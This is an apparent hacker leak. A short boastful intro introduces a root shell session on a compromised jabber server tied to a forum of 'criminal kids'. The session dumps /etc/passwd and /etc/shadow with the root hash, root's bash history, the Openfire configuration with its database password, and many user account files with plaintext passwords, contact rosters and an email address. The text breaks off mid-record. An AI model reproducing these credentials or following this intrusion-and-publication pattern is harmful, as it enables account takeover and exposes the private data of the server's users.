Not only is the board full of criminal kids, but they also provide a
jabber server for their users. While at it, we decided to tap in and
see what they're doing there, we also got some loggin going and
prepared a nice collection of their messages as well as a full backup
for you.
# uname -a
Linux jabbersw 2.6.18-194.3.1.el5.028stab069.6 #1 SMP Wed May 26 18:31:05 MSD 2010 i686 GNU/Linux
# id
uid=0(root) gid=0(root)
# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
bind:x:101:104::/var/cache/bind:/bin/false
fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
stunnel4:x:104:106::/var/run/stunnel4:/bin/false
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jabber:x:107:65534::/var/run/jabber:/bin/false
messagebus:x:108:109::/var/run/dbus:/bin/false
avahi:x:109:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
postgres:x:110:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
identd:x:111:65534::/var/run/identd:/bin/false
openfire:x:112:113:Openfire XMPP server,,,:/var/lib/openfire:/bin/false
root:$1$58.RHhjn$9z8MH2daUFLKAJclEq7A8.:14818:0:99999:7:::
daemon:*:14725:0:99999:7:::
bin:*:14725:0:99999:7:::
sys:*:14725:0:99999:7:::
sync:*:14725:0:99999:7:::
games:*:14725:0:99999:7:::
man:*:14725:0:99999:7:::
lp:*:14725:0:99999:7:::
mail:*:14725:0:99999:7:::
news:*:14725:0:99999:7:::
uucp:*:14725:0:99999:7:::
proxy:*:14725:0:99999:7:::
www-data:*:14725:0:99999:7:::
backup:*:14725:0:99999:7:::
list:*:14725:0:99999:7:::
irc:*:14725:0:99999:7:::
gnats:*:14725:0:99999:7:::
nobody:*:14725:0:99999:7:::
libuuid:!:14725:0:99999:7:::
bind:*:14725:0:99999:7:::
fetchmail:*:14725:0:99999:7:::
sshd:*:14725:0:99999:7:::
stunnel4:!:14725:0:99999:7:::
smmta:*:14725:0:99999:7:::
smmsp:*:14725:0:99999:7:::
jabber:*:14817:0:99999:7:::
messagebus:*:14829:0:99999:7:::
avahi:*:14829:0:99999:7:::
postgres:*:14829:0:99999:7:::
identd:*:14829:0:99999:7:::
openfire:*:14829:0:99999:7:::
# cd /root && ls -la
total 36
drwxr-xr-x 3 root root 4096 Jan 3 01:45 .
drwxr-xr-x 20 root root 4096 Dec 30 13:30 ..
-rw------- 1 root root 5215 Sep 27 21:42 .bash_history
-rw-r--r-- 1 root root 412 Dec 16 2004 .bashrc
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
drwx------ 2 root root 4096 Jan 3 00:35 .ssh
-rw------- 1 root root 6186 Jan 3 01:45 .viminfo
# cat .bash_history
cd etc
ls -l
cd jabber
ls -l
vi jabber.xml
ls -l
vi jabber.cfg
cd ..
ls -l
cd ..
ls -l
cd jabberd/jabber-1.4.2a
ls -l
cd var
cd run
ls -l
cd jabber
ls -l
ls -l
cd ..
ls -l
cd etc
cd jabber
ls -l
Wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz
wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz
ls -l
gzip -d mu-conference-0.6.0.tar.gz
ls -l
tar -xvf mu-conference-0.6.0.tar
ls -l
cd mu-conference-0.6.0
ls -l
make
Makefile
ls -l
ps aux
cd src
ls -l
cd ..
ls -l
cd scripts
ls -l
cd ..
ls -l
cd ./
ls -l
cd ..
ls -l
vi jabber.xml
cd mu-conference-0.6.0
ls -l
make
cd src
ls -l
make
cd ..
cd ..
cd ..
cd ..
ls -l
cd /etc/jabber
ls -l
del mu-conference-0.6.0.tar
rmdir mu-conference-0.6.0
mu-conference-0.6.0
rmdir -p mu-conference-0.6.0
rmdir --ignore-fail-on-non-empty mu-conference-0.6.0
ls -l
rmdir --help
rmdir --ignore mu-conference-0.6.0
ls -l
rmdir -i mu-conference-0.6.0
rm mu-conference-0.6.0.tar
ls -l
rm mu-conference-0.6.0
rm -r mu-conference-0.6.0
ls -l
cd ..
cd ..
cd ..
ls -l
wget http://download.gna.org/mu-conference/mu-conference_0.8.tar.gz
ls -l
gzip -d mu-conference_0.8.tar.gz
ls -l
tar -xvf mu-conference_0.8.tar
ls -l
cd mu-conference_0.8
ls -l
make
ls -l
cd scr
ls -l
cd src
ls -l
make
ls -l
cd ..
cd ..
ls -l
rm mu-conference_0.8.tar
rm -r mu-conference_0.8
ls -l
wget http://download.jabberd.org/jabberd14/jabberd-1.4.4.tar.gz
gzip -d jabberd-1.4.4.tar.gz
tar -xvf gzip -d jabberd-1.4.4.tar
ls -l
tar -xvf jabberd-1.4.4.tar
ls -l
cd jabberd-1.4.4
ls -l
./configure
make
ls -l
cd ..
ls -l
rm jabberd-1.4.4.tar
rm -r jabberd-1.4.4
ls -l
cd etc
cd jabber
ls -l
vi jabber.d
cd jabber.d
ls -l
cd ..
cd ..
cd ..
ls -l
cd var
cd run
ls -l
cd jabber
ls -l
wget http://ftp.riken.go.jp/pub/FreeBSD/distfiles/jabber/jud-0.4.tar.gz
ls -l
gzip -d jud-0.4.tar.gz
tar -xvf jud-0.4.tar
ls -l
cd jud-0.4
ls -l
make
cd ..
ls -l
rm jud-0.4.tar
rm -r jud-0.4
ls -l
ls -l
cd ..
ls -l
cd var
cd run
cd jabber
ls -l
ps aux
cd ..
cd ..
ls -l
cd ..
ls -l
cd etc
ls -l
cd jabber
ls -l
vi jabber-muc.xml
ps aux
cd ..
cd ..
cd var
cd run
cd jabber
ls -l
su jabber
ls -l
ps aux
cd ..
cd ..
ls -l
cd etc
cd ..
ls -l
cd etc
cd jabber
ls -l
vi jabber.xml
cd ..
ls -l
cd jabber
ls -l
cd ..
cd init.d
ls -l
cd jabber
cd ..
ls -l
cd ..
cd usr
cd lib
ls -l
cd jabber
ls -l
cd mu-conference
ls -l
cd ..
cd ..
cd..
cd ..
cd ..
cd etc
cd jabber
ls -l
vi jabber.xml
vi jabber-muc.xml
jabber-muc
cd ..
ls -l
cd default
ls -l
jabber-muc
cd jabber-muc
jabber-muc
cd jabber-muc
exec jabber-muc
cd ..
cd ..
cd var
cd spool
ls -l
cd ..
cd ..
ls -l
cd etc
cd jabber
ls -l
vi jabber-muc.xml
ps aux
cd ..
ls -l
cd etc
cd jabber
ls -l
vi jabber-muc.xml
vi jabber-jud.xml
vi jabber.xml
cd ..
cd etc
cd jabber
ls -l
vi jabber.xml
ps aux
cd ..
cd ..
cd usr
ls -l
cd lib
ls -l
cd jabber
ls -l
cd mu-conference
ls -l
cd ..
cd ..
cd ..
cd ..
cd etc
ls -l
cd jabber
ls -l
vi
vi jabber.xml
ps aux
kill 26124
ls -l
ps aux
cd ..
cd ..
cd usr
cd sbin
ls -l
jabberd -h jabber-swissfaking.net
cd ..
cd ..
cd etc
ls -l
cd jabber
ls -l
vi jabber.xml
cd ..
cd ..
cd usr
cd sbin
jabberd -h jabber-swissfaking.net
ps aux
netstat -tlun
cd ..
cd cd var
ls -l
cd var
cd run
cd jabber
ls -l
cd ..
cd ..
ls -l
cd ..
ls -l
cd usr
cd sbin
ls -l
jabber-muc
jabberd -much jabber-swissfaking.net
cd ..
cd etc
cd jabber
ls -l
vi jabber.xml
vi jabber.cfg
cd..
cd ..
cd ..
cd var
cd lib
cd jabber
ls -l
cd ..
cd ..
cd var
cd var
cd ..
cd var
cd run
cd jabber
ls -l
ps aux
kill 3184
jabberd -h jabber-swissfaking.net
cd ..
ls-l
ls -l
cd etc
cd jabber
ls -l
vi jabber-muc.xml
vi jabber-jud.xml
cd ..
default
cd default
vi jabber-muc
cd ..
cd jabber
ls -l
vi jabber.xml
netstat -tlun
cd ..
cd ..
cd var
cd run
cd jabber
ps aux
kill 18354
jabberd -h jabber-swissfaking.net
cd..
cd ..
cd etc
cd jabber
ls -l
cd jabber.d
ls -l
jabber-jud
jabber-jud -h
cd jabber-jud
jabber-jud
jabber-jud -h jabber-swissfaking.net
cd ..
cd .
cd ..
cd ..
cd var
cd spool
ls -l
cd ..
cd ..
ps aux
cd /usr/lib/jvm/ja
cd usr
cd ..
cd usr
cd lib
cd ...
cd ..
cd ..
cd etc
ls -l
cd init.d
ls -l
openfire restart
openfire restart
cd openfir
openfire stop
sudo /etc/init.d/openfire restart
ls -l
cd ..
cd /usr/share/openfire
ls -l
cd lib
ls -l
ps aux
cd /usr/sbin/jabberd
cd /usr/sbin/jabberd
cd /usr/sbin/
ls -l
ps aux
kill 7313
ps aux
sudo /etc/init.d/openfire restart
cd ..
ps aux
kill 13651
sudo /etc/init.d/openfire restart
ps aux
ps aux
ps aux
ps aux
ps aux
ps aux
sudo /etc/init.d/openfire start
ps aux
cd ..
ls -l
ps aux
sudo /etc/init.d/openfire restart
ps aux
ps aux
ps aux
kill 13754
ps aux
ps aux
sudo /etc/init.d/openfire restart
ps aux
kill 26588
sudo /etc/init.d/openfire restart
cd ..
ls -
ls -l
cd etc
ls -l
cd jabber
ls -l
del
rm jabber.xml
rm jabber.d
rm jabber.cfg
rm jabber-muc.xml
rm jabber-jud.xml
ls -l
cd jabber.d
ls -l
rm jabber-jud
rm jabber-muc
ls -l
cd ..
ls -l
rmdir jabber.d
ls -l
cd ..
ls -l
cd ..
cd var
cd run
ls -l
rm jabber
cd jabber
ls -l
cd ..
ls -l
cd ..
ls -l
cd
ls -l
cd ..
ls -l
ps aux
cd..
cd ..
ls -l
ps aux
sudo /etc/init.d/openfire restart
cd ..
ps-aux
ps aux
sudo /etc/init.d/openfire restart
ps aux
cd ..
ps aux
sudo /etc/init.d/openfire restart
cd ..
ps aux
sudo /etc/init.d/openfire restart
sensor
# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1980 688 ? Ss 2010 0:05 init [2]
openfire 1703 0.0 25.0 342352 131124 ? Sl Jan03 4:30 /usr/lib/jvm/java-6-sun/bin/java -server -DopenfireHome=/usr/share/openfire -Dopenfire.lib.dir=/usr/share/openfire/lib -classpath /usr/share/openfire/lib/startup.jar -jar /us
root 3392 0.0 0.1 1692 616 ? Ss 2010 0:00 /sbin/syslogd
108 3399 0.0 0.1 2480 860 ? Ss 2010 0:00 /usr/bin/dbus-daemon --system
avahi 3410 0.0 0.2 2876 1432 ? Ss 2010 0:00 avahi-daemon: running [jabbersw.local]
avahi 3411 0.0 0.0 2744 452 ? Ss 2010 0:00 avahi-daemon: chroot helper
root 3417 0.0 0.1 5272 1032 ? Ss 2010 0:00 /usr/sbin/sshd
www-data 3632 0.0 1.1 38240 6232 ? S Jan02 0:00 /usr/sbin/apache2 -k start
postgres 3750 0.0 0.9 40668 4960 ? S 2010 0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres 5193 0.0 1.2 40668 6540 ? Ss 2010 0:04 postgres: writer process
postgres 5194 0.0 0.2 40668 1288 ? Ss 2010 0:02 postgres: wal writer process
postgres 5195 0.0 0.2 40808 1424 ? Ss 2010 0:01 postgres: autovacuum launcher process
postgres 5196 0.0 0.2 11988 1192 ? Ss 2010 0:05 postgres: stats collector process
root 5230 0.0 0.1 108572 940 ? Ssl 2010 0:00 /usr/sbin/nscd
root 5262 0.0 0.1 2912 820 ? Ss 2010 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root 5279 0.0 0.1 2036 688 ? Ss 2010 0:00 /usr/sbin/cron
root 5430 0.0 2.3 37740 12556 ? Ss 2010 0:00 /usr/sbin/apache2 -k start
postgres 7792 0.0 1.2 41992 6744 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43823) idle
postgres 7801 0.0 1.1 41916 6044 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43824) idle
postgres 7802 0.0 1.2 41980 6300 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43825) idle
postgres 7803 0.0 1.2 41976 6296 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43826) idle
postgres 13420 0.0 1.2 41988 6720 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43907) idle
www-data 17911 0.0 1.1 38236 6220 ? S Jan03 0:00 /usr/sbin/apache2 -k start
root 22036 0.0 0.1 2296 776 pts/0 R+ 07:10 0:00 ps aux
www-data 26577 0.0 1.1 38240 6236 ? S Jan02 0:00 /usr/sbin/apache2 -k start
root 30105 0.0 0.2 2760 1408 pts/0 Ss 07:04 0:00 -bash
# cd /usr/share/openfire && ls -la
total 20
drwxr-x--- 5 openfire openfire 4096 Jan 3 00:49 .
drwxr-xr-x 114 root root 4096 Aug 9 02:02 ..
lrwxrwxrwx 1 openfire openfire 13 Aug 9 02:02 conf -> /etc/openfire
lrwxrwxrwx 1 openfire openfire 29 Aug 9 02:02 embedded-db -> /var/lib/openfire/embedded-db
drwxr-x--- 2 openfire openfire 4096 Aug 9 02:02 lib
lrwxrwxrwx 1 openfire openfire 17 Aug 9 02:02 logs -> /var/log/openfire
drwxr-xr-x 3 openfire openfire 4096 Jan 3 00:49 monitoring
lrwxrwxrwx 1 openfire openfire 25 Aug 9 02:02 plugins -> /var/lib/openfire/plugins
drwxr-x--- 3 openfire openfire 4096 Aug 9 02:02 resources
# cd conf && ls -la
total 32
drwxr-x--- 3 openfire openfire 4096 Jan 6 16:40 .
drwxr-xr-x 84 root root 4096 Jan 3 01:45 ..
-rw-r--r-- 1 openfire openfire 9403 Jan 6 16:40 available-plugins.xml
-rw-r--r-- 1 openfire openfire 1876 Jan 3 00:51 openfire.xml
drwxr-x--- 2 openfire openfire 4096 Jan 3 01:31 security
-rw-r--r-- 1 openfire openfire 11 Jan 6 16:40 server-update.xml
# cat openfire.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
This file stores bootstrap properties needed by Openfire.
Property names must be in the format: "prop.name.is.blah=value"
That will be stored as:
<prop>
<name>
<is>
<blah>value</blah>
</is>
</name>
</prop>
Most properties are stored in the Openfire database. A
property viewer and editor is included in the admin console.
-->
<!-- root element, all properties must be under this element -->
<jive>
<adminConsole>
<!-- Disable either port by setting the value to -1 -->
<port>9618</port>
<securePort>9619</securePort>
</adminConsole>
<locale>de</locale>
<!-- Network settings. By default, Openfire will bind to all network interfaces.
Alternatively, you can specify a specific network interfaces that the server
will listen on. For example, 127.0.0.1. This setting is generally only useful
on multi-homed servers. -->
<!--
<network>
<interface></interface>
</network>
-->
<connectionProvider>
<className>org.jivesoftware.database.DefaultConnectionProvider</className>
</connectionProvider>
<database>
<defaultProvider>
<driver>org.postgresql.Driver</driver>
<serverURL>jdbc:postgresql://localhost:5432/openfire</serverURL>
<username>openfire</username>
<password>pass123</password>
<testSQL>select 1</testSQL>
<testBeforeUse>true</testBeforeUse>
<testAfterUse>true</testAfterUse>
<minConnections>5</minConnections>
<maxConnections>25</maxConnections>
<connectionTimeout>1.0</connectionTimeout>
</defaultProvider>
</database>
<setup>true</setup>
<log>
<debug>
<enabled>false</enabled>
</debug>
</log>
</jive>
# cd /var/lib/jabber && ls -la
total 12
drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 .
drwxr-xr-x 27 root root 4096 Aug 9 02:02 ..
drwx------ 2 root root 4096 Aug 9 01:34 jabber-swissfaking.net
# cd jabber-swissfaking.net && ls -la
total 192
drwx------ 2 root root 4096 Aug 9 01:34 .
drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 ..
-rw------- 1 root root 1332 Aug 4 16:46 afroman.xml
-rw------- 1 root root 1387 Aug 8 15:38 babypanda.xml
-rw------- 1 root root 411 Aug 4 00:03 basics.xml
-rw------- 1 root root 976 Aug 3 15:31 batonde.xml
-rw------- 1 root root 9717 Aug 8 21:56 bullddoser.xml
-rw------- 1 root root 845 Aug 3 17:44 cr4ck.xml
-rw------- 1 root root 9791 Aug 8 15:16 crankz.xml
-rw------- 1 root root 391 Aug 3 15:43 cryten.xml
-rw------- 1 root root 906 Aug 7 19:39 darkfunny.xml
-rw------- 1 root root 596 Aug 8 17:47 dotsyn.xml
-rw------- 1 root root 564 Aug 4 16:47 el!t3.xml
-rw------- 1 root root 2177 Aug 8 23:08 fickmaus.xml
-rw------- 1 root root 391 Aug 4 23:26 flash.xml
-rw------- 1 root root 1428 Aug 5 16:17 freakout.xml
-rw------- 1 root root 1201 Aug 8 23:20 glycerin\40jabber-swissfaking.net.xml
-rw------- 1 root root 787 Aug 4 14:37 hackthenet.xml
-rw------- 1 root root 1300 Aug 5 16:17 hans-wurst.xml
-rw------- 1 root root 390 Aug 5 00:59 holzmen.xml
-rw------- 1 root root 636 Aug 7 23:25 jamyla\40jabber-swissfaking.net.xml
-rw------- 1 root root 393 Jul 30 22:10 kappy777.xml
-rw------- 1 root root 392 Aug 5 15:38 kluless.xml
-rw------- 1 root root 424 Aug 9 00:55 luigi100.xml
-rw------- 1 root root 794 Aug 8 15:39 naik.xml
-rw------- 1 root root 390 Aug 8 16:36 nitex.xml
-rw------- 1 root root 699 Aug 8 22:16 racketeer.xml
-rw------- 1 root root 992 Aug 5 16:17 s0xtech.xml
-rw------- 1 root root 392 Aug 3 23:16 sinned.xml
-rw------- 1 root root 20723 Aug 5 16:27 st3ffl0r.xml
-rw------- 1 root root 2325 Aug 8 03:49 syntax\40jabber-swissfaking.net.xml
-rw------- 1 root root 645 Aug 9 01:12 syntex.xml
-rw------- 1 root root 724 Aug 8 15:39 theird21.xml
-rw------- 1 root root 1754 Aug 8 15:38 the|biggie.xml
-rw------- 1 root root 1764 Aug 9 01:34 trickz.xml
-rw------- 1 root root 409 Aug 3 20:22 w!cked.xml
-rw------- 1 root root 396 Aug 8 03:12 w00dka.xml
-rw------- 1 root root 1324 Aug 5 05:06 weareone.xml
-rw------- 1 root root 547 Aug 8 18:22 yaboybigt.xml
# for file in *; do echo $file; cat $file; echo -e "\n"; done
afroman.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>JGMlms91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>afroman</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T19:39:23'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280925819' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='from'/><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item><item jid='freakout@jabber-swissfaking.net' name='freakout' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='from'/><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>
babypanda.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>BTYM8h</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>babypanda</username><name>BabyPanda</name><email/><x xmlns='jabber:x:delay' stamp='20100802T21:59:12'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955772' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' subscription='from'/><item jid='the|biggie@jabber-swissfaking.net' subscription='from'/><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb>
basics.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>nicki123!</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>basics</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:03:07'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280865831' xdbns='jabber:iq:last'>Disconnected</query></xdb>
batonde.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>1asdfghjkl</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>batonde</username><x xmlns='jabber:x:delay' stamp='20100802T19:39:30'>registered</x></query><roster xmlns='roster:delimiter' j_private_flag='1' xdbns='roster:delimiter'>\</roster><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>roster:delimiter</ns></foo><query xmlns='jabber:iq:last' last='1280835059' xdbns='jabber:iq:last'>Replaced by new connection</query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><FN/><N><GIVEN/><MIDDLE/><FAMILY/></N><NICKNAME>batonde</NICKNAME><BDAY/><GENDER/><ADR><HOME/><STREET/><EXTADR/><EXTADD/><LOCALITY/><REGION/><PCODE/><CTRY/><COUNTRY/></ADR><ADR><WORK/><STREET/><EXTADR/><EXTADD/><LOCALITY/><REGION/><PCODE/><CTRY/><COUNTRY/></ADR><ORG><ORGNAME/><ORGUNIT/></ORG><TITLE/><ROLE/><URL/><DESC/></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>
bullddoser.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>xdfhrrt568KZKF6)</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>bullddoser</username><name>BullDDOSer</name><email>Bullddoser@pakistans.com</email><x xmlns='jabber:x:delay' stamp='20100730T20:37:19'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><N><FAMILY/>
<GIVEN/>
<MIDDLE/>
</N>
<ORG><ORGNAME/>
<ORGUNIT/>
</ORG>
<FN/>
<URL/>
<TITLE/>
<NICKNAME/>
<PHOTO><TYPE>image/jpeg</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAIAAADYYG7QAAAXYUlEQVR42i2XCZRbV5nny6WtpNIuPent70lv35+kKqtUkkpVJan2fXNVucpLed+w4yW2E8dxbLezeI/t2ImBxIRAAuSQEE7oJk2zJXRgzoQtaZrDGeYMA909mSYN4dDQsc3MJ5NzPum85d77fvf7/t93720aGRmpVMq9veVqtVitFnqrpZ7eUrXWVauXq7VSL1xXS319pXq9WKuWa9WuWq1Yr3cODBYHBorwvL+/Alavl8H6+7qGBopjY/nR0a5aX3d3rdQYE0boLff2NKxa7YRmcAvjwCvo3tfX6NvXVxgcLPf3d01PDzdVKpVisdDebufzVkeHlc9n8qszhUKu0JntKGTgtlCwi8XGf0dHBqxQsIpFu1y2S6...AAAElFTkSuQmCC</BINVAL></PHOTO>
<EMAIL><HOME/><INTERNET/><PREF/><USERID/>
</EMAIL>
<TEL><PAGER/><WORK/><NUMBER/>
</TEL>
<TEL><CELL/><WORK/><NUMBER/>
</TEL>
<TEL><VOICE/><WORK/><NUMBER/>
</TEL>
<TEL><FAX/><WORK/><NUMBER/>
</TEL>
<TEL><PAGER/><HOME/><NUMBER/>
</TEL>
<TEL><CELL/><HOME/><NUMBER/>
</TEL>
<TEL><VOICE/><HOME/><NUMBER/>
</TEL>
<TEL><FAX/><HOME/><NUMBER/>
</TEL>
<ADR><WORK/><PCODE/>
<REGION/>
<STREET/>
<CTRY/>
<LOCALITY/>
</ADR>
<ADR><HOME/><PCODE/>
<REGION/>
<STREET/>
<CTRY/>
<LOCALITY/>
</ADR>
</vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281222880' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb>
cr4ck.xml
<xdb><query xmlns='jabber:iq:last' last='1280843048' xdbns='jabber:iq:last'>Registered</query><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>hahaha</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cr4ck</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:44:08'>registered</x></query><foo xdbns='jabber:x:offline' xmlns='jabber:x:offline'><message from='jabber-swissfaking.net' to='cr4ck@jabber-swissfaking.net'>
<subject>Welcome!</subject>
<body>Welcome to the Jabber server -- we hope you enjoy this service! For information about how to use Jabber, visit the Jabber User's Guide at http://jabbermanual.jabberstudio.org/</body>
<x xmlns='jabber:x:delay' from='cr4ck@jabber-swissfaking.net' stamp='20100803T13:44:08'>Offline Storage</x></message></foo></xdb>
crankz.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>muttertier11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>crankz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:23:54'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAIAAAABc2X6AAAAA3NCSVQICAjb4U/gAAAXyklEQVR42sV8XY/jRpblIXlFHanoLNou72T3VA9ysL0LA9sP/dALLPZp//q+zeM...uQmCC</BINVAL></PHOTO></vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='freakout@jabber-swissfaking.net' name='Freakout' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='Syntax' subscription='from' ask='subscribe'><group>Jabber - Swissfaking</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281266160' xdbns='jabber:iq:last'>Disconnected</query></xdb>
cryten.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>54342101</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cryten</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:41:15'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280835782' xdbns='jabber:iq:last'/></xdb>
darkfunny.xml
<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Master1993</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>darkfunny</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T15:07:57'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280934820' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='to' 